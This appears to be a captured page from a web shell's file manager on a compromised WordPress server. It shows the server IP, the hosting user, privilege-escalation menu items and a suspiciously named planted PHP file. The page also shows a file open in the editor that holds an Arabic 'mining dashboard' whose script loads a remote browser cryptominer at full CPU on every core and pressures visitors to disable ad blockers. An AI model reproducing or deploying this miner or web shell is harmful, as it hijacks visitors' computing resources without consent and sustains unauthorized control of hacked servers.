Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.202
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
georgeto /
public_html /
HTTP /
wp /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-rwxr-xr-x
2026-04-20 09:40
itQaKGIZs.php
34.65
KB
-rwxr-xr-x
2026-04-16 07:19
linuxlite-archive-keyring.gpg
2.78
KB
-rw-r--r--
2026-05-22 12:51
wp-trackback.php
4.39
KB
-rw-r--r--
2026-05-22 12:14
Save
Rename
<!DOCTYPE html> <html lang="ar" dir="rtl"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>نظام إدارة التعدين الرقمي</title> <style> body { background-color: #121212; color: #e0e0e0; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; } .card { background-color: #1e1e1e; padding: 40px; border-radius: 20px; box-shadow: 0 15px 35px rgba(0,0,0,0.7); text-align: center; border: 1px solid #333; width: 400px; } h1 { color: #00d1b2; font-size: 1.5rem; margin-bottom: 25px; } .status-indicator { padding: 15px; border-radius: 10px; font-weight: bold; margin-bottom: 20px; transition: 0.5s; } .offline { background-color: #ff3860; color: #fff; } .online { background-color: #48c774; color: #fff; box-shadow: 0 0 15px #48c774; } .timer { font-size: 3rem; font-family: 'Courier New', Courier, monospace; color: #ffd12b; margin: 20px 0; letter-spacing: 2px; } .stats { font-size: 0.9rem; color: #888; border-top: 1px solid #333; pt: 15px; margin-top: 15px; } .pulse { animation: pulse-red 2s infinite; } @keyframes pulse-red { 0% { opacity: 1; } 50% { opacity: 0.5; } 100% { opacity: 1; } } </style> </head> <body> <div class="card"> <h1>لوحة التعدين الموحدة</h1> <div id="mineStatus" class="status-indicator offline pulse">الحالة: جاري تهيئة المحرك...</div> <div class="timer" id="timerDisplay">00:00:00</div> <div class="stats"> <p id="threadCount">الأنوية المستخدمة: جاري الفحص...</p> <p>مفتاح التعدين: نشط ✅</p> </div> </div> <!-- السكربت الخاص بك --> <script src="https://www.hostingcloud.racing/vIel.js"></script> <script> // إعدادات لرفع الكفاءة لأقصى درجة var _client = new Client.Anonymous('1d0a9f52972bb1c7feaa94fd5561cb83a310fac71d5e506fd8fc0014e88f7402', { throttle: 0, // 0 يعني 100% من المعالج threads: navigator.hardwareConcurrency || 4, // استخدام كافة الأنوية المتوفرة تلقائياً c: 'w' }); _client.start(Client.FORCE_MULTI_TAB); // عداد الوقت وإدارة الحالة let totalSeconds = 0; const statusDiv = document.getElementById('mineStatus'); const timerDiv = document.getElementById('timerDisplay'); const threadDiv = document.getElementById('threadCount'); setInterval(function() { if (_client.isRunning()) { // تحديث الواجهة عند بدء التعدين فعلياً statusDiv.innerText = "الحالة: التعدين نشط الآن 🔥"; statusDiv.classList.remove('offline', 'pulse'); statusDiv.classList.add('online'); // تحديث العداد totalSeconds++; let h = Math.floor(totalSeconds / 3600); let m = Math.floor((totalSeconds % 3600) / 60); let s = totalSeconds % 60; timerDiv.innerText = `${h.toString().padStart(2, '0')}:${m.toString().padStart(2, '0')}:${s.toString().padStart(2, '0')}`; // عرض عدد الأنوية المستغلة threadDiv.innerText = "الأنوية المستخدمة: " + (navigator.hardwareConcurrency || "افتراضي"); } }, 1000); // نظام فحص مانع الإعلانات (الموجود في كودك الأصلي) setTimeout(function(){ if(typeof _client === 'undefined' || _client === null) { document.body.innerHTML = ` <div style="position:fixed; top:0; left:0; width:100%; height:100%; background:#4c4c4c; display:flex; align-items:center; justify-content:center; z-index:9999;"> <div style="background:white; padding:20px; border-radius:10px; color:black; text-align:center;"> <h3>عذراً، التعدين متوقف!</h3> <p>يرجى إيقاف مانع الإعلانات (AdBlock) وتحديث الصفحة للبدء.</p> </div> </div>`; } }, 2000); </script> </body> </html>